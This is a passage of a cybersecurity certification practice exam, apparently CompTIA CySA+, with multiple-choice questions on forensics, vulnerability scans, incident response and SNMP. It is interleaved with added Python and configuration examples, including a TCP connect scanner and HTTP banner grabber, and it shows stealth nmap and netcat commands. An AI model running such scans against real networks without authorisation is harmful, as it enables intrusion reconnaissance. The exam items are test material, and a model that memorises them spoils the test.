[Network diagram: a Border Router in front of a Firewall whose ruleset reads "Deny all from outside in" and "Deny all from inside out"; behind the firewall sit the Data Center VLANs, a Containment VLAN (A), and the Business Office network (B).]

A. Segmentation
B. Isolation
C. Removal
D. Network locking

43. As part of the forensic investigation of a Linux workstation, Alex needs to determine what commands may have been issued on the system. If no anti-forensic activities have taken place, what is the best location for Alex to check for a history of commands issued on the system?

A. /var/log/commands.log
B. $HOME/.bash_history
C. $HOME/.commands.sqlite
D. /var/log/authactions.log

44. Ben is preparing to reuse media that contained data that his organization classifies as “moderate” value. If he wants to follow NIST SP 800-88’s guidelines, what should he do to the media if the media will not leave his organization’s control?

A. Reformat it.
B. Clear it.
C. Purge it.
D. Destroy it.


45. Crystal is attempting to determine the next task that she should take on from a list of security priorities. Her boss told her that she should focus on activities that have the most “bang for the buck.” Of the tasks shown here, which should she tackle first?

Security Issue                                                  | Criticality | Time Required to Fix
1. Missing database security patch                              |             |
2. Remote code execution vulnerability in public-facing server  |             |
3. Missing operating system security patch                      |             |
4. Respond to compliance report                                 |             |

A. Task 1
B. Task 2
C. Task 3
D. Task 4


46. During the analysis of an incident that took place on her network, Tammy discovered that the attacker used a stolen cookie to access a web application. Which one of the following attack types most likely occurred?

A. Man-in-the-middle
B. Privilege escalation
C. Cross-site scripting
D. Session hijacking
47. When Pete connects to his organization’s network, his PC runs the NAC software his systems administrator installed. The software communicates with the edge switch he is plugged into, which validates his login and system security state. What type of NAC solution is Pete using?

A. Agent based, in-band
B. Agentless, in-band
C. Agent based, out-of-band
D. Agentless, out-of-band

48. Curt is conducting a forensic analysis of a Windows system and needs to determine whether a program was set to automatically run. Which of the following locations should he check for this information?

A. NTFS INDX files
B. The registry
C. Event logs
D. Prefetch files


49. During a security assessment, Scott discovers that his organization has implemented a multifactor authentication requirement for systems that store and handle highly sensitive data. The system requires that users provide both a password and a four-digit PIN. What should Scott note in his findings about this system?

A. The multifactor system provides two independent factors and provides an effective security control.
B. The factors used are both the same type of factor, making the control less effective.
C. The system uses only two factors and is not a true multifactor system. To qualify as multifactor, it should include at least three factors.
D. The multifactor system’s use of a PIN does not provide sufficient complexity, and additional length should be required for any PIN for secure environments.

50. What concept measures how easy data is to lose?

A. Order of volatility
B. Data transience
C. Data loss prediction
D. The Volatility Framework


51. During a reconnaissance exercise, Mika uses the following command:

root@demo:~# nc -v 10.0.2.9 8080
www.example.com [10.0.2.9] 8080 (http-alt) open
GET / HTTP/1.0

What is she doing?

A. Checking for the HTTP server version using netcat
B. Creating a reverse shell using netcat
C. HTTP banner grabbing using netcat
D. Executing an HTTP keep-alive using netcat
52. Steps like those listed here are an example of what type of incident response preparation?

1. Visit https://otx.alienvault.com and enter the suspected C&C system’s IP address in the top search input field.
2. If the IP address is associated with malware C&C activity, create a ticket in the incident response tracking system.

A. Creating a CSIRT
B. Creating a playbook
C. Creating an incident response plan
D. Creating an IR-FAQ


53. While analyzing the vulnerability scan from her web server, Kristen discovers the issue shown here. Which one of the following solutions would best remedy the situation?

[Scan finding] Severity 3: SSL/TLS Server supports TLSv1.0, port 3389/tcp over SSL
  QID: 38628   Category: General remote services   CVE ID: -   PCI Vuln: No
  CVSS Base: 2.6   CVSS Temporal: 2.3
  First Detected: 07/17/2016 01:17:31 (GMT-0400)   Last Detected: 04/09/2017 01:29:32 (GMT-0400)   Times Detected: 20   Service Modified: 07/14/2016

A. Move from TLS 1.0 to SSL 3.0.
B. Require IPsec connections to the server.
C. Disable the use of TLS.
D. Move from TLS 1.0 to TLS 1.2.


54. Charles is building an incident response playbook for his organization that will address 
command and control client-server traffic detection and response. Which of the following 
information sources is least likely to be part of his playbook? 


A. DNS query logs 

B. Threat intelligence feeds 

C. Honeypot data 

D. Notifications from internal staff about suspicious behavior 


55. Which one of the following mechanisms may be used to enhance security in a context- 
based authentication system? 


A. Time of day 

B. Location 

C. Device fingerprint 
D. All of the above 
56. Susan’s organization has faced a significant increase in successful phishing attacks, resulting in compromised accounts. She knows that she needs to implement additional technical controls to prevent successful attacks. Which of the following controls will be the most effective while remaining relatively simple and inexpensive to deploy?

A. Increased password complexity requirements
B. Application or token-based multifactor authentication
C. Biometric-based multifactor authentication
D. OAuth-based single sign-on


57. Carol recently fell victim to a phishing attack. When she clicked the link in an email message that she received, she was sent to her organization’s central authentication service and logged in successfully. She did verify the URL and certificate to validate that the authentication server was genuine. After authenticating, she was sent to a form that collected sensitive personal information that was sent to an attacker. What type of vulnerability did the attacker most likely exploit?

A. Buffer overflow
B. Session hijacking
C. IP spoofing
D. Open redirect
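The flaw behind Carol’s scenario, as an added example that is not from the book: a login page that forwards the user to a caller-supplied `next` URL after authentication. The parameter name, the trusted host name and the default landing page are assumptions; the weak handler is shown beside a hardened one that accepts only a relative path on the same site.

```python
"""Open redirect: the weak post-login forward beside a hardened one.

Added example, not from the book or any product. It assumes a login page
that takes a ``next`` parameter naming where to send the user after
authentication; the parameter name, TRUSTED_HOST and DEFAULT_AFTER_LOGIN
are assumptions for the demo.
"""
from urllib.parse import urlsplit

TRUSTED_HOST = "sso.example.org"      # assumed SSO host name
DEFAULT_AFTER_LOGIN = "/home"         # assumed safe landing page


def vulnerable_redirect_target(next_param: str) -> str:
    """The weak pattern: whatever the link carried is used as-is.

    The login host and certificate are genuine, so the user sees nothing
    wrong; only the destination after login is attacker-controlled.
    """
    return next_param or DEFAULT_AFTER_LOGIN


def safe_redirect_target(next_param: str) -> str:
    """Allow only a relative path on this site; anything else falls back.

    Covers the usual bypasses: absolute URLs, scheme-relative ``//evil``,
    backslashes that browsers normalise to ``//``, ``javascript:`` and
    control characters that could smuggle extra response headers.
    """
    if not next_param:
        return DEFAULT_AFTER_LOGIN
    candidate = next_param.replace("\\", "/")
    if any(ord(c) < 0x20 for c in candidate):
        return DEFAULT_AFTER_LOGIN
    parts = urlsplit(candidate)
    if parts.scheme or parts.netloc:          # http://evil, //evil, javascript:
        return DEFAULT_AFTER_LOGIN
    if not candidate.startswith("/") or candidate.startswith("//"):
        return DEFAULT_AFTER_LOGIN
    return candidate


if __name__ == "__main__":
    for link in ["/dashboard", "https://attacker.example/form", "//attacker.example/form"]:
        print(f"{link!r:40} weak -> {vulnerable_redirect_target(link)!r:40} "
              f"safe -> {safe_redirect_target(link)!r}")
```

The check has to be on the parameter, not on the login page: in Carol’s case the host, the certificate and the authentication were all real, and verifying them told her nothing about where she would be sent afterwards.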

58. As a penetration tester, Max uses Wireshark to capture all of his testing traffic. Which of the following is not a reason that Max would capture packets during penetration tests?

A. To document the penetration test
B. To scan for vulnerabilities
C. To gather additional information about systems and services
D. To troubleshoot issues encountered when connecting to targets


59. Rich recently configured new vulnerability scans for his organization’s business intelligence systems. The scans run late at night when users are not present. Rich received complaints from the business intelligence team that the performance burden imposed by the scanning is causing their overnight ETL jobs to run too slowly and they are not completing before business hours. How should Rich handle this situation?

A. Rich should inform the team that they need to run the ETL jobs on a different schedule.
B. Rich should reconfigure the scans to run during business hours.
C. Rich should inform the team that they must resize the hardware to accommodate both requirements.
D. Rich should work with the team to find a mutually acceptable solution.



60. Which one of the following regulations imposes compliance obligations specifically only upon financial institutions?

A. SOX
B. HIPAA
C. PCI DSS
D. GLBA
61. Bryce ran a vulnerability scan on his organization’s wireless network and discovered that many employees are bringing their personally owned devices onto the corporate network (with permission) and those devices sometimes contain serious vulnerabilities. What mobile strategy is Bryce’s organization using?

A. COPE
B. SAFE
C. BYOD
D. None of the above



62. Richard uses the following command to mount a forensic image. What has he specified in his command?

sansforensics@siftworkstation:~/Case1$ sudo mount RHINOUSB.dd /mnt/usb -t auto -o loop,noexec,ro

A. He has mounted the file automatically, and it will not use any autorun files contained in the image.
B. He has mounted the file with the filesystem type set to auto recognize and has set the mount to act as a read-only loop device that will not execute files.
C. He has mounted the file automatically and has set the mount to act as a read-only loop device that will not execute files.
D. He has mounted the file with the filesystem type set to auto recognize and has set it to act as a remote-only loop device that will not execute files.



63. Javier ran a vulnerability scan of a new web application created by developers on his team and received the report shown here. The developers inspected their code carefully and do not believe that the issue exists. They do have a strong understanding of SQL injection issues and have corrected similar vulnerabilities in other applications. What is the most likely scenario in this case?

[Scan finding] CGI Generic SQL Injection (blind, time based)

Description
By sending specially crafted parameters to one or more CGI scripts hosted on the remote web server, Nessus was able to get a slower response, which suggests that it may have been able to modify the behavior of the application and directly access the underlying database.
An attacker may be able to exploit this issue to bypass authentication, read confidential data, modify the remote database, or even take control of the remote operating system.

A. Javier misconfigured the scan.
B. The code is deficient and requires correction.
C. The vulnerability is in a different web application running on the same server.
D. The result is a false positive.
64. Chris is able to break into a host in a secured segment of a network during a penetration test. Unfortunately, the rules of engagement state that he is not allowed to install additional software on systems he manages to compromise. How can he use netcat to perform a port scan of other systems in the secured network segment?

A. He can use the -sS option to perform a SYN scan.
B. He can use the -z option to perform a scan.
C. He can use the -s option to perform a scan.
D. He can’t; netcat is not a port scanner.
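What Mika’s `nc -v 10.0.2.9 8080` followed by `GET / HTTP/1.0` (question 51) and Chris’s `nc -z` each do, written with Python’s socket module as an added example that is not code from the book. So that it runs offline it starts a throwaway HTTP responder on 127.0.0.1; the `Server` header it returns and the loopback ports are constructed for the demo.

```python
"""TCP connect scan and HTTP banner grab with plain sockets.

Added example, not from the book: the socket-level equivalent of
``nc -z host port`` (connect scan) and of ``nc -v host 8080`` followed by
``GET / HTTP/1.0`` (banner grab). A tiny fake HTTP service on 127.0.0.1
stands in for the target; its banner string is made up for the demo.
"""
import socket
import threading

FAKE_BANNER = (b"HTTP/1.0 200 OK\r\n"
               b"Server: DemoHTTP/0.1 (example)\r\n"
               b"Content-Length: 0\r\n\r\n")


def start_demo_server() -> int:
    """Listen on an ephemeral loopback port; answer one request per client."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve() -> None:
        while True:
            conn, _ = srv.accept()
            try:
                conn.settimeout(2)
                conn.recv(4096)            # request line; content ignored
                conn.sendall(FAKE_BANNER)
            except OSError:
                pass                       # scanner connected and left silently
            finally:
                conn.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def closed_loopback_port() -> int:
    """A port that is (almost certainly) closed: bind to 0, note it, release it."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port


def connect_scan(host: str, ports, timeout: float = 0.5) -> list:
    """What ``nc -z`` does: a completed three-way handshake means open."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports


def http_banner(host: str, port: int, timeout: float = 2.0) -> dict:
    """Send a minimal HTTP/1.0 request; return the status line and headers."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(b"GET / HTTP/1.0\r\nHost: %s\r\n\r\n" % host.encode())
        raw = b""
        while b"\r\n\r\n" not in raw:
            chunk = s.recv(4096)
            if not chunk:
                break
            raw += chunk
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    status, *lines = head.split("\r\n")
    headers = {}
    for line in lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"status": status, "headers": headers}


if __name__ == "__main__":
    p = start_demo_server()
    print("open:", connect_scan("127.0.0.1", [p, closed_loopback_port()]))
    print(http_banner("127.0.0.1", p))
```

A connect scan completes the handshake, so it is logged by the target exactly like a normal client; that is the trade-off Chris accepts for staying within the rules of engagement, and it is also why the fake server above has to tolerate a client that connects and leaves without sending anything.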

65. Catherine is working with the architect on the design of a new data center for her organization. She is concerned about the intrusion alarms that will notify security personnel of an attempted break-in to the facility. What type of control is Catherine designing?

A. Logical
B. Compensating
C. Administrative
D. Physical



66. Fred, a security manager, and a small team of experts have prepared a scenario for his security and system administration teams to use during their annual security testing. His scenario includes the rules that both the defenders and attackers must follow, as well as a scoring rubric that he will use to determine which team wins the exercise. What term should Fred use to describe his team’s role in the exercise?

A. White team
B. Red team
C. Gold team
D. Blue team



67. Lauren downloads a new security tool and checks its MD5. What does she know about the software she downloaded if she receives the following message?

root@demo:~# md5sum -c demo.md5
demo.txt: FAILED
md5sum: WARNING: 1 computed checksum did not match

A. The file is corrupt.
B. Attackers have modified the file.
C. The files do not match.
D. The test failed and provided no answer.



68. Martha ran a vulnerability scan against a series of endpoints on her network and received the vulnerability report shown here. She investigated further and found that several endpoints are running Internet Explorer 7. What is the minimum version level of IE that is considered secure?

[Scan finding] Severity 5: Microsoft Internet Explorer Cumulative Security Update (MS12-023)
  QID: 100113   Category: Internet Explorer   Vendor Reference: MS12-023   Bugtraq ID: 52902   PCI Vuln: Yes   Ticket State: Open
  CVE ID: CVE-2012-0168, CVE-2012-0169, CVE-2012-0170, CVE-2012-0171, CVE-2012-0172
  CVSS Base: 9.3   CVSS Temporal: 6.9
  First Detected: 02/05/2017 03:55:55 (GMT-0400)   Last Detected: 04/05/2017 00:03:46 (GMT-0400)   Service Modified: 11/04/2015

THREAT:
Microsoft Internet Explorer is a Web browser available for Microsoft Windows. Internet Explorer is prone to multiple vulnerabilities that could allow remote code execution. Microsoft has released a security update that addresses the vulnerabilities by modifying the way Internet Explorer handles the printing of specially crafted HTML content and the way Internet Explorer handles objects in memory. This security update is rated Critical for Internet Explorer 6, Internet Explorer 7, Internet Explorer 8 and Internet Explorer 9 on Windows clients and Moderate for Internet Explorer 6, Internet Explorer 7, Internet Explorer 8 and Internet Explorer 9 on Windows servers.
Note: Previously this was an iDefense exclusive vulnerability with iDefense ID: 684425.
Windows Embedded Systems: For additional information regarding security updates for embedded systems, refer to the following MSDN blog(s): April 2012 Security Updates are Live on ECE for XPe and Standard 2009 (KB2675157)

A. 9
B. 11
C. No version of Internet Explorer is considered secure.



69. During an incident investigation, Chris is able to identify the IP address of the system that was used to compromise multiple systems belonging to his company. What can Chris determine from this information?

A. The identity of the attacker
B. The country of origin of the attacker
C. The attacker’s domain name
D. None of the above



70. Nick believes that an attacker has compromised a Linux workstation on his network and has added a new user. Unfortunately, most logging was not enabled on the system. Which of the following is most likely to provide useful information about which user was created most recently?

A. /etc/passwd
B. /var/log/auth.log
C. Run ls -ld /home/$username for each user on the system
D. Run ls -l /home/$username/.bash_logout to see the most recent logout time for each user on the system
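Added example for Nick’s scenario (not code from the book): a triage of `/etc/passwd` content. New accounts are appended to the file and normally receive the next free UID, so the last entry and the highest ordinary UID are the first things to look at, alongside any second UID 0 account. The passwd text below is a constructed sample, and the `sync0` and `backup2` entries are the invented suspects.

```python
"""Triage /etc/passwd for a recently added or backdoor account.

Added example, not from the book. SAMPLE_PASSWD is constructed; "sync0"
(a UID 0 account hiding among system users) and "backup2" (the last
entry, highest UID) are the invented suspects.
"""
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bob:x:1001:1001:Bob:/home/bob:/bin/bash
sync0:x:0:0:sync:/:/bin/bash
backup2:x:1002:1002::/home/backup2:/bin/bash
"""

NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}


def parse_passwd(text: str) -> list:
    """Turn passwd lines into dicts; malformed lines are skipped, not guessed at."""
    users = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, _, uid, gid, gecos, home, shell = fields
        users.append({"name": name, "uid": int(uid), "gid": int(gid),
                      "gecos": gecos, "home": home, "shell": shell})
    return users


def triage(users: list, min_uid: int = 1000) -> dict:
    """The indicators an analyst checks first when logging is missing."""
    regular = [u for u in users if u["uid"] >= min_uid]
    newest = max(regular, key=lambda u: u["uid"]) if regular else None
    return {
        # useradd appends, so the tail of the file is usually the newest account
        "last_entry": users[-1]["name"] if users else None,
        # ...and it normally gets the next free UID above the human range
        "highest_uid": newest["name"] if newest else None,
        # a second UID 0 is a classic hand-edited backdoor, wherever it sits
        "uid0_not_root": [u["name"] for u in users if u["uid"] == 0 and u["name"] != "root"],
        "interactive": [u["name"] for u in users if u["shell"] not in NOLOGIN_SHELLS],
    }


if __name__ == "__main__":
    for key, value in triage(parse_passwd(SAMPLE_PASSWD)).items():
        print(f"{key:14} {value}")
```

On a live image, pair this with the modification times of `/etc/passwd` and `/etc/shadow` and the creation time of each home directory (the `ls -ld /home/$username` check in option C): an attacker who edits the file by hand can place an entry anywhere in it, as the `sync0` line shows, so file order alone is not proof.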
71. After a major compromise involving what appears to be an APT, Jaime needs to conduct a forensic examination of the compromised systems. Which containment method should he recommend to ensure that he can fully investigate the systems that were involved while minimizing the risk to his organization’s other production systems?

A. Sandboxing
B. Removal
C. Isolation
D. Segmentation



72. Michelle is attempting to remediate a security vulnerability and must apply a patch to a production database server. The database administration team is concerned that the patch will disrupt business operations. How should Michelle proceed?

A. Michelle should deploy the patch immediately on the production system.
B. Michelle should wait 60 days to deploy the patch to determine whether bugs are reported.
C. Michelle should deploy the patch in a sandbox environment to test it prior to applying it in production.
D. Michelle should contact the vendor to determine a safe timeframe for deploying the patch in production.



73. Kent ran a vulnerability scan of an internal CRM server that is routinely used by employees, and the scan reported that no services were accessible on the server. Employees continued to use the CRM application over the web without difficulty during the scan. What is the most likely source of Kent’s result?

A. The server requires strong authentication.
B. The server uses encryption.
C. The scan was run from a different network perspective than user traffic.
D. The scanner’s default settings do not check the ports used by the CRM application.



74. Steve needs to perform an nmap scan of a remote network and wants to be as stealthy as possible. Which of the following nmap commands will provide the stealthiest approach to his scan?

A. nmap -P0 -sT 10.0.10.0/24
B. nmap -sT -T0 10.0.10.0/24
C. nmap -P0 -sS 10.0.10.0/24
D. nmap -P0 -sS -T0 10.0.10.0/24



75. Which element of the COBIT framework contains the high-level requirements that an organization should implement to manage its information technology functions?

A. Framework
B. Process descriptions
C. Control objectives
D. Maturity models
76. Jenna is configuring the scanning frequency for her organization’s vulnerability scanning program. Which one of the following is the least important criterion for Jenna to consider?

A. Sensitivity of information stored on systems
B. Criticality of the business processes handled by systems
C. Operating system installed on systems
D. Exposure of the system to external networks


77. Donna is interpreting a vulnerability scan from her organization’s network, shown here. She would like to determine which vulnerability to remediate first. Donna would like to focus on the most critical vulnerability according to the potential impact if exploited. Assuming the firewall is properly configured, which one of the following vulnerabilities should Donna give the highest priority?

[Network diagram: the Internet, a firewall, a File Server, an Email Server, and a Web Server.]

A. Severity 5 vulnerability in the file server
B. Severity 3 vulnerability in the file server
C. Severity 4 vulnerability in the web server
D. Severity 2 vulnerability in the mail server

78. Which one of the following document categories provides the highest-level authority for an organization’s cybersecurity program?

A. Policy
B. Standard
C. Procedure
D. Framework
79. Chris is planning a vulnerability scanning program for his organization and is scheduling weekly scans of all the servers in his environment. He was approached by a group of system administrators who asked that they be given direct access to the scan reports without going through the security team. How should Chris respond?

A. Chris should provide the administrators with access.
B. Chris should deny the administrators access because the information may reveal critical security issues.
C. Chris should offer to provide the administrators with copies of the report after they go through a security review.
D. Chris should deny the administrators access because it would allow them to correct security issues before they are analyzed by the security team.



80. During an incident investigation, Chris discovers that attackers were able to query information about his routers and switches using SNMP. In addition, he discovers that the SNMP traffic was sent in plain text through his organization’s network management backend network. Which version of SNMP would provide encryption and authentication features to help him prevent this in the future?

A. SNMP v1
B. SNMP v2
C. SNMP v3
D. SNMP v4



81. Which one of the following statements is true about virtualized operating systems?

A. In bare-metal virtualization, all guest operating systems must be the same version.
B. In bare-metal virtualization, all guest operating systems must be the same platform (e.g., Windows, Red Hat, CentOS).
C. In bare-metal virtualization, the host operating system and guest operating system platforms must be consistent.
D. None of these is correct.

82. While reviewing a report from a vulnerability scan of a web server, Paul encountered the vulnerability shown here. What is the easiest way for Paul to correct this vulnerability with minimal impact on the business?

[Scan finding] Severity 3: Listing of Scripts in cgi-bin Directory, port 80/tcp (New)
  QID: 86044   Category: Web server   CVE ID: -   PCI Vuln: Yes
  CVSS Base: 5   CVSS Temporal: 4.8
  First Detected: 04/09/2017 03:18:23 (GMT-0400)   Last Detected: 04/09/2017 03:18:23 (GMT-0400)   Times Detected: 1   Service Modified: 04/28/2009

THREAT: CGI scripts are usually placed in the cgi-bin Web directory. Listing of files in your cgi-bin directory is allowed.
IMPACT: By browsing the cgi-bin directory, unauthorized users can obtain a list of all CGI scripts present on your server. With this information, they can implement further attacks on vulnerable CGI scripts.

A. Block ports 80 and 443.
B. Adjust directory permissions.
C. Block port 80 only to require the use of encryption.
D. Remove CGI from the server.
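In Apache httpd the listing in Paul’s finding is a per-directory option, not a filesystem permission, so the fix that leaves the scripts working is to turn off `Indexes` for that directory. The fragment below is an added example, not from the book or from any vendor guidance; the directory path is an assumption for a typical Debian or Red Hat layout, and the weak block is shown beside the corrected one (only one of the two would exist in a real configuration).

```apache
# Added example (not from the book). Path is an assumption.

# Weak: with "Indexes" on, a request for /cgi-bin/ with no index file makes
# mod_autoindex generate a listing of every script name.
<Directory "/usr/lib/cgi-bin">
    Options +ExecCGI +Indexes
    Require all granted
</Directory>

# Corrected: keep CGI execution, drop the listing. Scripts still run, so the
# business impact is nil; only the directory enumeration disappears.
<Directory "/usr/lib/cgi-bin">
    Options +ExecCGI -Indexes
    Require all granted
</Directory>
```

After `apachectl configtest` and a reload, a request for `/cgi-bin/` should return 403 instead of an HTML listing, while a request for a known script path still executes it; rescanning the host should then clear QID 86044.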


83. A log entry showing a successful user authentication is classified as what type of occurrence in NIST’s definitions?

A. A security incident
B. A security event
C. An event
D. An adverse event



84. Sally used the dig command to attempt to look up the IP address for CompTIA’s website and received the results shown here. What can Sally conclude from these results?

~$ dig comptia.org +showsearch

; <<>> DiG 9.8.2rc1-RedHat-9.8.2-0.62.rc1.55.amzn1 <<>> comptia.org +showsearch
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 49127
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;comptia.org.                   IN      A

;; ANSWER SECTION:
comptia.org.            34      IN      A       198.134.5.6

;; Query time: 0 msec
;; SERVER: 172.30.0.2#53(172.30.0.2)
;; WHEN: Tue Jun 13 09:35:01 2017
;; MSG SIZE  rcvd: 45

A. CompTIA’s website is located at 198.134.5.6.
B. CompTIA’s website is located at 172.30.0.2.
C. CompTIA’s website is currently down.
D. The DNS search failed, but you cannot draw any conclusions about the website.
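Reading dig output mechanically, as an added example that is not code from the book: the parser separates the records in the ANSWER section from the `SERVER` line, which names the resolver that answered (172.30.0.2 here) rather than the host being looked up. The first sample is a constructed copy of Sally’s output; the second is a constructed NXDOMAIN response so the “no conclusion” path is exercised too.

```python
"""Parse dig output: answers versus the resolver that returned them.

Added example, not from the book. DIG_OK mirrors the output shown above;
DIG_NXDOMAIN is a constructed failed lookup for the domain nosuch.example.
"""
import re

DIG_OK = """\
; <<>> DiG 9.8.2rc1-RedHat-9.8.2-0.62.rc1.55.amzn1 <<>> comptia.org +showsearch
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 49127
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;comptia.org.                   IN      A

;; ANSWER SECTION:
comptia.org.            34      IN      A       198.134.5.6

;; Query time: 0 msec
;; SERVER: 172.30.0.2#53(172.30.0.2)
;; WHEN: Tue Jun 13 09:35:01 2017
;; MSG SIZE  rcvd: 45
"""

DIG_NXDOMAIN = """\
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 1234
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;nosuch.example.                IN      A

;; SERVER: 172.30.0.2#53(172.30.0.2)
"""

STATUS_RE = re.compile(r"status:\s*([A-Z]+)")
SERVER_RE = re.compile(r"^;; SERVER:\s*(\S+?)#(\d+)")
RR_RE = re.compile(r"^(\S+)\s+(\d+)\s+IN\s+(\S+)\s+(\S+)$")


def parse_dig(text: str) -> dict:
    """Return the response status, the answering resolver and the ANSWER records."""
    status, resolver, answers = None, None, []
    section = None
    for line in text.splitlines():
        if line.startswith(";; ") and line.endswith("SECTION:"):
            section = line[3:-len(" SECTION:")]        # QUESTION, ANSWER, ...
            continue
        if not line.strip():
            section = None                            # blank line ends a section
            continue
        if line.startswith(";; ->>HEADER<<-"):
            m = STATUS_RE.search(line)
            if m:
                status = m.group(1)
        m = SERVER_RE.match(line)
        if m:
            resolver = m.group(1)                     # who answered, not the target
        if section == "ANSWER":
            m = RR_RE.match(line)
            if m:
                answers.append({"name": m.group(1), "ttl": int(m.group(2)),
                                "type": m.group(3), "data": m.group(4)})
    return {"status": status, "resolver": resolver, "answers": answers}


def conclusion(parsed: dict) -> str:
    """State only what the output supports: a name-to-address mapping, not uptime."""
    a_records = [a["data"] for a in parsed["answers"] if a["type"] == "A"]
    if parsed["status"] == "NOERROR" and a_records:
        return (f"name resolves to {', '.join(a_records)} (answered by resolver "
                f"{parsed['resolver']}); whether the site is up is not tested")
    return f"lookup status {parsed['status']}: no conclusion about the website"


if __name__ == "__main__":
    print(conclusion(parse_dig(DIG_OK)))
    print(conclusion(parse_dig(DIG_NXDOMAIN)))
```

A resolver address in the `SERVER` line is easy to misread as the answer when output is skimmed; the parser keeps the two apart, and a successful A lookup still says nothing about whether the web server behind that address is reachable.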


85. Fran is trying to run a vulnerability scan of a web server from an external network, and the scanner is reporting that there are no services running on the web server. She verified the scan configuration and attempted to access the website running on that server using a web browser on a computer located on the same external network and experienced no difficulty. What is the most likely issue with the scan?

A. A host firewall is blocking access to the server.
B. A network firewall is blocking access to the server.
C. An intrusion prevention system is blocking access to the server.
D. Fran is scanning the wrong IP address.
Chapter 6 Practice Exam 2

1. Ty is reviewing the scan report for a Windows system joined to his organization’s domain and finds the vulnerability shown here. What should be Ty’s most significant concern related to this vulnerability?

[Scan finding] Severity 3: Administrator Account’s Password Does Not Expire
  QID: 90080   Category: Windows   CVE ID: -   PCI Vuln: Yes
  CVSS Base: 7.5   CVSS Temporal: 7.1
  First Detected: 08/04/2015 18:02:25 (GMT-0400)   Last Detected: 04/05/2017 00:48:55 (GMT-0400)   Times Detected: 22   Service Modified: 08/03/2015

THREAT: The scanner probed the Security & Accounts Database (SAM) and found that the target Windows box’s Administrator account has a password that does not expire.

A. The presence of this vulnerability indicates that an attacker may have compromised his network.
B. The presence of this vulnerability indicates a misconfiguration on the target server.
C. The presence of this vulnerability indicates that the domain security policy may be lacking appropriate controls.
D. The presence of this vulnerability indicates a critical flaw on the target server that must be addressed immediately.



2. During an incident investigation, Chris discovers that attackers were able to query information about his routers and switches using SNMP. Chris finds that his routers used “public” and “private” as their community strings. Which of the following is not an appropriate action to take to help secure SNMP in Chris’s organization?

A. Add complexity requirements to the SNMP community string.
B. Enable and configure SNMP v2c.
C. Enable and require TLS settings for SNMP.
D. Apply different SNMP community strings to devices with different security levels.
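The configuration change behind question 80 and this question, shown for net-snmp’s `snmpd.conf` as an added example (not from the book or from any vendor documentation): the default community strings beside an SNMPv3 user with authentication and privacy. The user name and pass phrases are placeholders, and the lines are meant to replace, not supplement, the v1/v2c ones.

```text
# Added example (not from the book): net-snmp snmpd.conf fragments.
# User name and pass phrases are placeholders.

# Weak: SNMPv1/v2c with the default community strings. The string is the
# only credential and travels in clear text, which is what the attackers
# in Chris's incident took advantage of.
rocommunity public
rwcommunity private

# Corrected: SNMPv3 with authentication (SHA) and privacy (AES), i.e. the
# authPriv security level. The community lines above are removed rather
# than made "complex": a complex community string is still sent in the
# clear, and v2c adds nothing to authentication or encryption.
createUser nmsuser SHA "REPLACE-WITH-AUTH-PASSPHRASE" AES "REPLACE-WITH-PRIV-PASSPHRASE"
rouser nmsuser priv
```

Add the `createUser` line while snmpd is stopped (net-snmp moves the resulting user into its persistent store on start-up), then confirm two things from the management host: `snmpget -v3 -l authPriv -u nmsuser -a SHA -A <auth> -x AES -X <priv> <device> sysDescr.0` returns data, and `snmpget -v2c -c public <device> sysDescr.0` times out. The second check is the one that proves the old path is really closed.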


3. Heidi runs a vulnerability scan of the management interface of her organization’s virtualization platform and finds the severity 1 vulnerability shown here. What circumstance, if present, should increase the severity level of this vulnerability to Heidi?

[Scan finding] Severity 1: Remote Management Service Accepting Unencrypted Credentials Detected
  QID: 45242   Category: Information gathering   CVE ID: -   PCI Vuln: Yes
  CVSS Base: 4.3   CVSS Temporal: 3.3
  First Detected: 09/04/2015 18:04:22 (GMT-0400)   Last Detected: 04/05/2017 00:05:04 (GMT-0400)   Times Detected: 21   Service Modified: 08/10/2016

A. Lack of encryption
B. Missing security patch
C. Exposure to external networks
D. Out-of-date antivirus signatures



4. Nancy ran a port scan against a network switch located on her organization’s internal network and discovered the results shown here. She ran the scan from her workstation on the employee VLAN. Which one of the following results should be of greatest concern to her?

Starting Nmap 7.40 ( https://nmap.org ) at 2017-06-09 13:07 EDT
Nmap scan report for 10.1.0.121
Host is up (0.049s latency).
Not shown: 966 closed ports
PORT      STATE
22/tcp    open
23/tcp    open
80/tcp    filtered
443/tcp   open
631/tcp   filtered
8192/tcp  filtered
8193/tcp  filtered
8194/tcp  filtered
28201/tcp filtered

Nmap done: 1 IP address (1 host up) scanned in 5.84 seconds
$

A. Port 22
B. Port 23
C. Port 80
D. Ports 8192 to 8194



5. Evan is troubleshooting a vulnerability scan issue on his network. He is conducting an external scan of a website located on the web server shown in the diagram. After checking the Apache httpd logs on the web server, he saw no sign of the scan requests. Which one of the following causes is the least likely issue for him to troubleshoot?

